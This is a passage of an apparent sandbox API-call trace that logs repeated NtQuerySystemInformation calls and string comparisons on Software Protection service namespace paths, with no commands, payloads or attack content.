_String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0273.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.742] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.756] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd150, Length=0x28, ResultLength=0x0) [0273.769] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcfa0, Length=0x28, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, 